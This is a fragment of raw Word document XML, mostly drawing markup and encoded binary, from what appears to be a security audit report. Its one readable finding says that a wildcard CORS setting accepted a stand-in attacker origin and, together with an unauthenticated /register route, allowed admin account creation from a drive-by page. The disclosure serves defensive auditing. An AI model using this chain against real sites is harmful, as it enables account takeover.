Z9L&#10;yDiJ/GGyslIvTtYhvAGpZjBL1ThJg1DvTJLelm0/6VIRw6vDMDDO5yOCAA6bj1STrcloZsungkPn&#10;aM+CsFcP+ZNTljP+RPHl8DlB44UibOs76DkivKzsE7eMPYQ6wsTF4yY0I/sUG5U3taTLeG+9cl7G&#10;+07XXnkZ74epHt988NsfvqYM3ynVx8XpM1KNX1Nv/gEAAP//AwBQSwMEFAAGAAgAAAAhALsX7uzh&#10;AAAACQEAAA8AAABkcnMvZG93bnJldi54bWxMj0Frg0AQhe+F/odlCr0lq0mUaB1DCG1PodCkUHrb&#10;6EQl7qy4GzX/vttTcxzex3vfZJtJt2Kg3jaGEcJ5AIK4MGXDFcLX8W22BmGd4lK1hgnhRhY2+eND&#10;ptLSjPxJw8FVwpewTRVC7VyXSmmLmrSyc9MR++xseq2cP/tKlr0afblu5SIIYqlVw36hVh3taiou&#10;h6tGeB/VuF2Gr8P+ct7dfo7Rx/c+JMTnp2n7AsLR5P5h+NP36pB7p5O5cmlFixAt4pVHEWbLGIQH&#10;knidgDghrKIEZJ7J+w/yXwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQB&#10;AAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBMU+DnswQAAJUV&#10;AAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQC7F+7s4QAA&#10;AAkBAAAPAAAAAAAAAAAAAAAAAA0HAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAGwgA&#10;AAAA&#10;">
                <v:shape id="Shape 1999" o:spid="_x0000_s1027" style="position:absolute;left:381;width:21526;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="21526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65xAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/odlhN50o6XSRFcRoVSoIFrF65idJqnZ2ZBdTfTXuwWht3m8z5nOW1OKK9WusKxgOIhAEKdW&#10;F5wp2H9/9N9BOI+ssbRMCm7kYD7rdqaYaNvwlq47n4kQwi5BBbn3VSKlS3My6Aa2Ig7cj60N+gDr&#10;TOoamxBuSjmKorE0WHBoyLGiZU7peXcxCjI+RNuv32NzfOP152n9Wmzu6VKpl167mIDw1Pp/8dO9&#10;0mF+HMfw9004Qc4eAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFeO3rnEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l2143125,v2630,,4875,930,6735,2791c2151719,4651,2152649,6896,2152650,9525r,123825c2152649,135992,2151719,138224,2149860,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791c930,138224,,135992,,133350l,9525c,6896,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,2152650,142875"/>
                </v:shape>
                <v:shape id="Shape 2002" o:spid="_x0000_s1028" style="position:absolute;left:23717;width:4381;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4381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FexQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvBf9DeIKXUrMVWWRrlEUoFIRSbcXra/KaXdy8hE2q2/56IxR6HGbmG2a5HlwnztTH1rOCx2kB&#10;glh707JV8PH+/LAAEROywc4zKfihCOvV6G6JlfEX3tF5n6zIEI4VKmhSCpWUUTfkME59IM7el+8d&#10;pix7K02Plwx3nZwVRSkdtpwXGgy0aUif9t9OwXHxGrZv89pyrW3Qv/fl4dOWSk3GQ/0EItGQ/sN/&#10;7RejIBNncHuTn4BcXQEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAvabFexQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l438150,r,142875l9525,142875v-2631,,-4876,-930,-6736,-2791l,133351,,9524,2789,2791c4649,930,6894,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,438150,142875"/>
                </v:shape>
                <v:shape id="Shape 2007" o:spid="_x0000_s1029" style="position:absolute;top:1714;width:5810;height:1429;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g8xgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9bawIx&#10;FITfC/6HcARfSs0qpdrVKCoIhT54a8HH4+a4FzcnS5Lq+u9NodDHYWa+Yabz1tTiSs6XlhUM+gkI&#10;4szqknMFX4f1yxiED8gaa8uk4E4e5rPO0xRTbW+8o+s+5CJC2KeooAihSaX0WUEGfd82xNE7W2cw&#10;ROlyqR3eItzUcpgkb9JgyXGhwIZWBWWX/Y9RcNh9n163m2NVvW+fF65abtafLJXqddvFBESgNvyH&#10;/9ofWkEkjuD3TXwCcvYAAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAo4TYPMYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m9525,l571500,v2630,,4875,930,6735,2791c580095,4651,581025,6896,581025,9525r,123825c581025,135992,580095,138224,578235,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791c930,138224,,135992,,133350l,9525c,6896,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,581025,142875"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>config/cors.php:22</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allowed_origins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' =&gt; ['*'</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confirmed: </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Origin: https://attacker.example.com</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AccessControl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-Allow-Origin: </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Combined with the unauthenticated </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/register</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (V-01), that alone was enough to create an admin account from a drive-by page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D21DED3"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5808" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E70FD52" wp14:editId="4FB329A0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1846957</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19906</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1714500" cy="571500"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26992" name="Group 26992"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1714500" cy="571500"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1714500" cy="571500"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2023" name="Shape 2023"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="781050" y="0"/>
                            <a:ext cx="933450" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="933450" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="923925" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="926555" y="0"/>
                                  <a:pt x="928801" y="930"/>
                                  <a:pt x="930660" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="932520" y="4651"/>
                                  <a:pt x="933450" y="6896"/>
                                  <a:pt x="933450" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="933450" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="933450" y="135992"/>
                                  <a:pt x="932520" y="138224"/>
                                  <a:pt x="930660" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="928801" y="141945"/>
                                  <a:pt x="926555" y="142875"/>
                                  <a:pt x="923925"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36" name="Shape 2036"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="438150"/>
                            <a:ext cx="809625" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="809625" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="800100" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="802730" y="0"/>
                                  <a:pt x="804975" y="930"/>
                                  <a:pt x="806835" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="808695" y="4651"/>
                                  <a:pt x="809625" y="6896"/>
                                  <a:pt x="809625" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="809625" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="809625" y="126467"/>
                                  <a:pt x="808695" y="128699"/>
                                  <a:pt x="806835" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="804975" y="132420"/>
                                  <a:pt x="802730" y="133350"/>
                                  <a:pt x="800100" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126467"/>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D993A9B" id="Group 26992" o:spid="_x0000_s1026" style="position:absolute;margin-left:145.45pt;margin-top:-1.55pt;width:135pt;height:45pt;z-index:-251420672" coordsize="1714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&#10;">
                <v:shape id="Shape 2023" o:spid="_x0000_s1027" style="position:absolute;left:7810;width:9335;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="933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k2yAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BS8NA&#10;FITvBf/D8gQvxW5ModjYbSkFtaBQbUvB2yP7zAazb5PsmsR/7xYKPQ4z8w2zWA22Eh21vnSs4GGS&#10;gCDOnS65UHA8PN8/gvABWWPlmBT8kYfV8ma0wEy7nj+p24dCRAj7DBWYEOpMSp8bsugnriaO3rdr&#10;LYYo20LqFvsIt5VMk2QmLZYcFwzWtDGU/+x/rYKX9cecT2+mH+9eu/fDvGk2X9wodXc7rJ9ABBrC&#10;NXxpb7WCNEmncH4Tn4Bc/gMAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQASb9k2yAAAAN0A&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" path="m9525,l923925,v2630,,4876,930,6735,2791c932520,4651,933450,6896,933450,9525r,123825c933450,135992,932520,138224,930660,140084v-1859,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791c930,138224,,135992,,133350l,9525c,6896,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,933450,142875"/>
                </v:shape>
                <v:shape id="Shape 2036" o:spid="_x0000_s1028" style="position:absolute;top:4381;width:8096;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8096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0cxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvQv/D8gq96aa2iERXiQFLoKdGRY+P7DMbmn0bsluN/fXdguBxmJlvmOV6sK24UO8bxwpeJwkI&#10;4srphmsF+912PAfhA7LG1jEpuJGH9epptMRUuyt/0aUMtYgQ9ikqMCF0qZS+MmTRT1xHHL2z6y2G&#10;KPta6h6vEW5bOU2SmbTYcFww2FFuqPouf6yC91/z+XHKi/3BHYtS3/KM7CZT6uV5yBYgAg3hEb63&#10;C61gmrzN4P9NfAJy9QcAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAvhM0cxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l800100,v2630,,4875,930,6735,2791c808695,4651,809625,6896,809625,9525r,114300c809625,126467,808695,128699,806835,130559v-1860,1861,-4105,2791,-6735,2791l9525,133350v-2630,,-4875,-930,-6735,-2791c930,128699,,126467,,123825l,9525c,6896,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,809625,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6832" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2750BC43" wp14:editId="5F5327B6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5114031</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19906</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1247776" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26994" name="Group 26994"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1247776" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1247776" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2026" name="Shape 2026"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="457201" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="457201" h="142875">
                                <a:moveTo>
                                  <a:pt x="9526" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="447676" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="450306" y="0"/>
                                  <a:pt x="452551" y="930"/>
                                  <a:pt x="454411" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="456271" y="4651"/>
                                  <a:pt x="457201" y="6896"/>
                                  <a:pt x="457201" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="457201" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="457201" y="135992"/>
                                  <a:pt x="456271" y="138224"/>
                                  <a:pt x="454411" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="452551" y="141945"/>
                                  <a:pt x="450306" y="142875"/>
                                  <a:pt x="447676" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9526" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135992"/>
                                  <a:pt x="1" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6896"/>
                                  <a:pt x="930" y="4651"/>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29" name="Shape 2029"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="695326" y="0"/>
                            <a:ext cx="552450" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="552450" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="552450" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="552450" y="142875"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6894" y="142875"/>
                                  <a:pt x="4649" y="141945"/>
                                  <a:pt x="2789" y="140084"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="133351"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9524"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2789" y="2791"/>
                                </a:ln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9B7668D" id="Group 26994" o:spid="_x0000_s1026" style="position:absolute;margin-left:402.7pt;margin-top:-1.55pt;width:98.25pt;height:11.25pt;z-index:-251419648" coordsize="12477,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1JRCAQAAHUOAAAOAAAAZHJzL2Uyb0RvYy54bWzsV1mPozgQfl9p/wPifTtAOELU6ZF2e7pf&#10;RrujOX6A2zEBCTCy6SQ9v37LZcqBkMwp9dPkIRjX4aqvLnP75tjU3l4oXcl244c3ge+Jlstt1e42&#10;/udPD3+tfE/3rN2yWrZi478I7b+5+/OP20O3FpEsZb0VygMlrV4fuo1f9n23Xiw0L0XD9I3sRAvE&#10;QqqG9fCqdoutYgfQ3tSLKAjSxUGqbackF1rD7r0l+neovygE7/8rCi16r974YFuP/wr/n8z/4u6W&#10;rXeKdWXFBzPYT1jRsKqFQ52qe9Yz71lVM1VNxZXUsuhvuGwWsigqLtAH8CYMzrx5VPK5Q19268Ou&#10;czABtGc4/bRa/u/+UXUfu/cKkDh0O8AC34wvx0I15glWekeE7MVBJo69x2EzjOIsy1Lf40AL42iV&#10;JRZTXgLwMzFevv264IKOXUyMOXSQHvqEgP41BD6WrBMIrF4DAu+VV203fhRE4EjLGshT5PBwB4FB&#10;PgeTXmtA7HsxipMMgnsOkfOUrfmz7h+FRLDZ/p3ubVZuacVKWvFjS0sFuf3VrO5Yb+SMlWbpHTY+&#10;WVK6WBlqI/fik0S+3kQsTwwOFGuw88RQt2PGOM5SE/sRKzHw56eK/y2+TNiTYBmM2MEuPC9OoiQB&#10;fEBNvhxKkihxHFpKlOWhySwwZ6p7+kZyaZRZuTgF1YgnkWww4LB0ladXSAAB5vHsNPJvpixcLpcJ&#10;Gg8yxHXZNmdAuEzyPJqa4AwPl6soiqdEh0YYB8EKiTMLL5/pEA7jMI+HGiUnXFjGBTwQTyE+EWdn&#10;kr9WxuXPRIJ4LtkHkUgw/icJlxwpoGpSY244pASRfggNk2SocYYw7Z+HxabSJMRTN8g5C8CQy6cc&#10;IvJUyDLbM89zkWw8T1/n84/VA4F4Vl8O90nVufhROk/N5rXUwlai6StYkq7XYGqculndmrYDLnIG&#10;w72oWY9Tsql6mPp11ZgBkgUBHVS3oM30ettecdW/1ML0prr9IAro0ziJzIZWu6d/auXtmZnt+EPl&#10;rO5KNuya8gGTBlZcox4jX1R17VSGKDpR+fb+IXrABgEaBmYjJ/Ba4SQDK8kHa+zdAiY0OE03DJB3&#10;QniybHsn38K9CM0ceWuWT3L7glMZ